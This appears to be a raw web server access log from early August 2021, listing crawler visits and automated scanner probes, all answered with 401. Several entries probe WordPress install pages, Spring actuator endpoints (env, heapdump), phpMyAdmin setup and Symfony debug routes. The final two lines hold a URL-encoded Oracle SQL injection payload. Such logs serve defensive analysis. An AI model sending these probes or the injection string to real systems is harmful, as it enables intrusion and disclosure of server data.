139.59.78.248 - - [31/Jul/2021:09:18:57 +0200] "GET /wp-login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.249.66.73 - - [31/Jul/2021:09:44:31 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.73 - - [31/Jul/2021:09:44:31 +0200] "GET / HTTP/1.1" 401 736 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.74 - - [31/Jul/2021:11:50:05 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.78.23.193 - - [31/Jul/2021:13:43:47 +0200] "GET /' HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
80.78.23.193 - - [31/Jul/2021:13:53:38 +0200] "GET /' HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
104.248.227.52 - - [31/Jul/2021:18:35:31 +0200] "GET /wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:31 +0200] "GET /wp/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:31 +0200] "GET /new/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:32 +0200] "GET /old/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:32 +0200] "GET /wordpress/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:32 +0200] "GET /test/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:33 +0200] "GET /blog/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:34 +0200] "GET /cms/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:34 +0200] "GET /web/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:34 +0200] "GET /backup/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:34 +0200] "GET /site/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:35 +0200] "GET /oldsite/wp-admin/install.php HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:36 +0200] "GET /wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:36 +0200] "GET /wp/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:36 +0200] "GET /new/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:37 +0200] "GET /old/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:37 +0200] "GET /wordpress/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:37 +0200] "GET /test/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:37 +0200] "GET /blog/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:38 +0200] "GET /cms/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:38 +0200] "GET /web/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:38 +0200] "GET /backup/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:38 +0200] "GET /site/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.248.227.52 - - [31/Jul/2021:18:35:39 +0200] "GET /oldsite/wp-admin/install.php HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
114.119.156.33 - - [31/Jul/2021:22:13:54 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.150.41 - - [01/Aug/2021:00:31:45 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
80.78.23.193 - - [01/Aug/2021:03:51:02 +0200] "GET /abcdefga HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
80.78.23.193 - - [01/Aug/2021:06:55:47 +0200] "GET /abcdefga HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
51.15.113.160 - - [01/Aug/2021:07:03:37 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.68.21 - - [01/Aug/2021:11:42:55 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.23 - - [01/Aug/2021:11:42:56 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.23 - - [01/Aug/2021:12:49:53 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.148 - - [01/Aug/2021:17:07:38 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.150 - - [01/Aug/2021:17:07:39 +0200] "GET /index.php?m=polkmiu&id=16381 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.42.89.160 - - [01/Aug/2021:19:25:59 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1"
114.119.159.161 - - [01/Aug/2021:19:43:23 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
80.78.23.193 - - [02/Aug/2021:03:05:16 +0200] "GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0"
80.78.23.193 - - [02/Aug/2021:03:56:46 +0200] "GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.6.1000"
51.15.81.169 - - [02/Aug/2021:07:04:13 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.66.150 - - [02/Aug/2021:08:52:03 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.146 - - [02/Aug/2021:08:52:03 +0200] "GET / HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.148.163 - - [02/Aug/2021:09:46:35 +0200] "GET /index.php?m=polkmiu&id=12958 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.233 - - [02/Aug/2021:15:09:29 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.156.33 - - [02/Aug/2021:17:41:44 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.150.114 - - [02/Aug/2021:22:36:36 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.148 - - [02/Aug/2021:23:49:17 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.144 - - [02/Aug/2021:23:49:18 +0200] "GET /index.php?m=polkmiu&id=14252 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.227.90.185 - - [03/Aug/2021:03:31:43 +0200] "GET / HTTP/1.1" 401 681 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
64.227.90.185 - - [03/Aug/2021:03:31:44 +0200] "GET /robots.txt HTTP/1.1" 401 681 "-" "-"
64.227.90.185 - - [03/Aug/2021:03:31:45 +0200] "GET /sitemap.xml HTTP/1.1" 401 681 "-" "-"
64.227.90.185 - - [03/Aug/2021:03:31:46 +0200] "GET /.well-known/security.txt HTTP/1.1" 401 681 "-" "-"
64.227.90.185 - - [03/Aug/2021:03:31:47 +0200] "GET /favicon.ico HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
51.15.235.181 - - [03/Aug/2021:07:06:00 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
77.88.5.9 - - [03/Aug/2021:09:16:57 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.9 - - [03/Aug/2021:09:17:01 +0200] "GET / HTTP/1.1" 401 736 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.110 - - [03/Aug/2021:13:22:47 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.110 - - [03/Aug/2021:13:22:51 +0200] "GET / HTTP/1.1" 401 740 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.66.73 - - [03/Aug/2021:18:10:46 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.74 - - [03/Aug/2021:18:10:46 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.74 - - [03/Aug/2021:20:18:30 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.200.17.190 - - [04/Aug/2021:00:50:55 +0200] "GET / HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4a) Gecko/20030401"
104.128.16.63 - - [04/Aug/2021:02:56:14 +0200] "GET / HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
104.128.16.63 - - [04/Aug/2021:02:56:14 +0200] "GET /robots.txt HTTP/1.1" 401 740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
104.128.16.63 - - [04/Aug/2021:02:56:15 +0200] "GET / HTTP/1.1" 401 740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
51.15.64.111 - - [04/Aug/2021:07:07:31 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
114.119.147.32 - - [04/Aug/2021:09:43:17 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.151.107 - - [04/Aug/2021:12:11:28 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.15.224.119 - - [05/Aug/2021:07:09:40 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
114.119.130.111 - - [05/Aug/2021:09:18:38 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.70.91 - - [06/Aug/2021:01:34:56 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.95 - - [06/Aug/2021:01:34:56 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.95 - - [06/Aug/2021:02:36:59 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.146.246 - - [06/Aug/2021:05:43:54 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.15.224.119 - - [06/Aug/2021:07:11:10 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.70.95 - - [06/Aug/2021:15:26:38 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.95 - - [06/Aug/2021:15:26:38 +0200] "GET / HTTP/1.1" 401 736 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [06/Aug/2021:17:43:33 +0200] "GET /index.php?m=polkmiu&id=17081 HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.209.177.145 - - [06/Aug/2021:20:26:37 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "netEstate NE Crawler (+http://www.website-datenbank.de/)"
80.78.23.193 - - [06/Aug/2021:23:14:05 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
80.78.23.193 - - [07/Aug/2021:00:00:56 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
66.249.70.3 - - [07/Aug/2021:01:42:17 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.30 - - [07/Aug/2021:01:42:17 +0200] "GET /index.php?m=polkmiu&id=glazurnik HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.137.7 - - [07/Aug/2021:06:16:14 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.70.91 - - [07/Aug/2021:06:35:01 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.91 - - [07/Aug/2021:06:35:01 +0200] "GET / HTTP/1.1" 401 736 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.95 - - [07/Aug/2021:06:40:05 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.15.64.111 - - [07/Aug/2021:07:12:14 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
71.6.167.124 - - [07/Aug/2021:14:24:33 +0200] "GET / HTTP/1.1" 401 681 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.167.124 - - [07/Aug/2021:14:24:36 +0200] "GET /robots.txt HTTP/1.1" 401 681 "-" "-"
71.6.167.124 - - [07/Aug/2021:14:24:40 +0200] "GET /sitemap.xml HTTP/1.1" 401 681 "-" "-"
71.6.167.124 - - [07/Aug/2021:14:24:42 +0200] "GET /.well-known/security.txt HTTP/1.1" 401 681 "-" "-"
71.6.167.124 - - [07/Aug/2021:14:24:46 +0200] "GET /favicon.ico HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
66.249.70.3 - - [07/Aug/2021:17:18:35 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.30 - - [07/Aug/2021:17:18:36 +0200] "GET /index.php?m=polkmiu&id=18331 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.157.158 - - [07/Aug/2021:18:53:38 +0200] "GET /index.php?m=polkmiu&id=12958 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.70.93 - - [07/Aug/2021:22:20:45 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.91 - - [07/Aug/2021:22:20:45 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.69.176.198 - - [08/Aug/2021:00:09:11 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/84.0.4147.105 Safari/537.36"
66.249.70.95 - - [08/Aug/2021:00:24:51 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.137.65 - - [08/Aug/2021:07:55:04 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
194.163.163.20 - - [08/Aug/2021:18:26:19 +0200] "GET /_ignition/health-check HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [08/Aug/2021:18:35:50 +0200] "GET /_ignition/health-check HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
178.159.37.182 - - [08/Aug/2021:20:36:06 +0200] "GET /index.php HTTP/1.0" 401 704 "http://www.sno.uw.edu.pl/index.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49"
194.163.163.20 - - [09/Aug/2021:00:55:19 +0200] "GET /actuator/env HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:01:05:21 +0200] "GET /actuator/env HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
114.119.154.65 - - [09/Aug/2021:03:32:18 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
194.163.163.20 - - [09/Aug/2021:04:37:04 +0200] "GET /phpmyadmin/setup/index.php HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:04:46:22 +0200] "GET /phpmyadmin/setup/index.php HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
66.249.70.3 - - [09/Aug/2021:05:10:03 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.3 - - [09/Aug/2021:05:10:03 +0200] "GET / HTTP/1.1" 401 740 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.15.35.105 - - [09/Aug/2021:07:20:08 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.70.91 - - [09/Aug/2021:07:45:57 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [09/Aug/2021:07:45:57 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [09/Aug/2021:12:51:45 +0200] "GET /_profiler/phpinfo HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:13:01:22 +0200] "GET /_profiler/phpinfo HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
185.191.171.19 - - [09/Aug/2021:15:18:07 +0200] "GET /robots.txt HTTP/1.1" 401 700 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [09/Aug/2021:15:18:07 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.70.28 - - [09/Aug/2021:16:58:53 +0200] "GET /index.php?m=polkmiu&id=18558 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [09/Aug/2021:17:13:38 +0200] "GET /actuator/heapdump HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:17:23:17 +0200] "GET /actuator/heapdump HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:21:17:18 +0200] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:21:27:25 +0200] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
